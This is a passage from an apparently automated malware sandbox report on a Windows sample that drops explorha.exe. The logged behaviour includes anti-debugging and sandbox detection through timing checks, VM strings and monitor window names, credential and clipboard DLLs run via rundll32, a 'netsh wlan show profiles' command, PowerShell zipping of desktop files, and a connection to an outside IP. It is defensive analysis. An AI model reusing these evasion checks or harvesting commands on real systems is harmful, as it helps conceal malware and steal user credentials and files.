                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660D48 second address: 5660D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D84h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660DDE second address: 5660DE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660DE4 second address: 5660DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660DEA second address: 5660DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660DEE second address: 5660DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8CEFE1 second address: 8CEFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: 8CEFEE second address: 8CEFF3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A424F9 second address: A42501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A42501 second address: A42506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A30424 second address: A3042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F449CEB0736h 0x0000000a rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A3042E second address: A30434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A30434 second address: A3043A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A41707 second address: A41711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F449CC63D76h 0x0000000a rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A419FD second address: A41A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A41CD3 second address: A41CE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A41CE8 second address: A41CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A442E3 second address: A4435C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1D5Bh], ebx 0x0000000f push 00000000h 0x00000011 add esi, 7F8E79C4h 0x00000017 call 00007F449CC63D79h 0x0000001c push eax 0x0000001d jmp 00007F449CC63D88h 0x00000022 pop eax 0x00000023 push eax 0x00000024 jmp 00007F449CC63D84h 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d jl 00007F449CC63D7Eh 0x00000033 jns 00007F449CC63D78h 0x00000039 push eax 0x0000003a pop eax 0x0000003b mov eax, dword ptr [eax] 0x0000003d pushad 0x0000003e ja 00007F449CC63D81h 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A4435C second address: A44360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A44360 second address: A443F4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push ecx 0x00000010 jmp 00007F449CC63D84h 0x00000015 pop ecx 0x00000016 pop eax 0x00000017 mov edi, dword ptr [ebp+122D3B9Ch] 0x0000001d push 00000003h 0x0000001f jo 00007F449CC63D7Ch 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F449CC63D78h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov esi, dword ptr [ebp+122D3BE8h] 0x00000047 push 00000003h 0x00000049 call 00007F449CC63D79h 0x0000004e push eax 0x0000004f push eax 0x00000050 jnc 00007F449CC63D76h 0x00000056 pop eax 0x00000057 pop eax 0x00000058 push eax 0x00000059 jmp 00007F449CC63D83h 0x0000005e mov eax, dword ptr [esp+04h] 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A443F4 second address: A443F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A443F8 second address: A443FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A443FE second address: A44404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A444BE second address: A44500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007F449CC63D78h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 xor dword ptr [ebp+122D1DCEh], edx 0x0000002a pop ecx 0x0000002b push 984C87ACh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A44500 second address: A4454C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F449CEB0738h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 67B378D4h 0x00000013 js 00007F449CEB073Eh 0x00000019 push esi 0x0000001a mov edi, dword ptr [ebp+122D3E28h] 0x00000020 pop edx 0x00000021 push 00000003h 0x00000023 jmp 00007F449CEB073Dh 0x00000028 push 00000000h 0x0000002a mov dx, 9128h 0x0000002e push 00000003h 0x00000030 add dh, FFFFFFD2h 0x00000033 push 8F6B59D9h 0x00000038 pushad 0x00000039 jns 00007F449CEB0738h 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A4454C second address: A44552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A44552 second address: A4457E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xor dword ptr [esp], 4F6B59D9h 0x0000000d mov dword ptr [ebp+122D1CBEh], ebx 0x00000013 lea ebx, dword ptr [ebp+124491EEh] 0x00000019 mov si, 644Dh 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007F449CEB073Ch 0x00000026 jnl 00007F449CEB0736h 0x0000002c rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRDTSC instruction interceptor: First address: A4457E second address: A44588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F449CC63D76h 0x0000000a rdtsc
                                Tries to evade debugger and weak emulator (self modifying code)
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSpecial instruction interceptor: First address: E7EF39 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSpecial instruction interceptor: First address: 1017B72 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSpecial instruction interceptor: First address: 10A75A6 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSpecial instruction interceptor: First address: 8CEF39 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSpecial instruction interceptor: First address: A67B72 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeSpecial instruction interceptor: First address: AF75A6 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: 0_2_05660C66 rdtsc 0_2_05660C66
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1332Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1326Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1077Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeWindow / User API: threadDelayed 1083Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3985
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5840
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-11022
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6968Thread sleep time: -58029s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1072Thread sleep count: 1332 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1072Thread sleep time: -2665332s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4144Thread sleep count: 1326 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4144Thread sleep time: -2653326s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6972Thread sleep count: 258 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6972Thread sleep time: -7740000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 332Thread sleep time: -360000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6980Thread sleep count: 1077 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6980Thread sleep time: -2155077s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4080Thread sleep count: 1083 > 30Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4080Thread sleep time: -2167083s >= -30000sJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 2032Thread sleep count: 158 > 30Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 2032Thread sleep time: -158000s >= -30000sJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772Thread sleep time: -8301034833169293s >= -30000s
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                                Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread delayed: delay time: 30000Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior
                                Source: explorha.exe, explorha.exe, 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                Source: rundll32.exe, 00000008.00000003.2435834677.00000256D12C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b})
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW{
                                Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.3041565537.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2440652752.00000256D1263000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2440652752.00000256D12BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3037845134.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3037845134.0000000002D9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: rundll32.exe, 00000008.00000003.2435834677.00000256D12C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe, 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                Source: netsh.exe, 00000009.00000003.2362319007.0000021FF4074000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeSystem information queried: ModuleInformationJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Hides threads from debuggers
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeThread information set: HideFromDebuggerJump to behavior
                                Potentially malicious time measurement code found
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_049F043A Start: 049F048B End: 049F040A6_2_049F043A
                                Tries to detect sandboxes and other dynamic analysis tools (window names)
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeOpen window title or class name: regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeOpen window title or class name: gbdyllo
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeOpen window title or class name: procmon_window_class
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeOpen window title or class name: ollydbg
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeOpen window title or class name: filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: NTICE
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: SICE
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeFile opened: SIWVID
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: 0_2_05660C66 rdtsc 0_2_05660C66
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: 0_2_00E47BBB mov eax, dword ptr fs:[00000030h]0_2_00E47BBB
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeCode function: 0_2_00E4B922 mov eax, dword ptr fs:[00000030h]0_2_00E4B922
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_0089B922 mov eax, dword ptr fs:[00000030h]1_2_0089B922
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 1_2_00897BBB mov eax, dword ptr fs:[00000030h]1_2_00897BBB
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_0089B922 mov eax, dword ptr fs:[00000030h]2_2_0089B922
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 2_2_00897BBB mov eax, dword ptr fs:[00000030h]2_2_00897BBB
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_0089B922 mov eax, dword ptr fs:[00000030h]6_2_0089B922
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_00897BBB mov eax, dword ptr fs:[00000030h]6_2_00897BBB
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 193.233.132.56 80Jump to behavior
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeProcess created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, MainJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, MainJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
                                Source: explorha.exe, explorha.exe, 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: gProgram Manager
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeCode function: 6_2_0087F436 cpuid 6_2_0087F436
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.xlsx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\JSDNGYCOWY.docx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\JSDNGYCOWY.xlsx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\KZWFNRXYKI.docx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU.docx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\NIKHQAIQAU.xlsx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\RAYHIWGKDI.xlsx VolumeInformationJump to behavior
                                Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\ZBEDCJPBEY.docx VolumeInformationJump to behavior
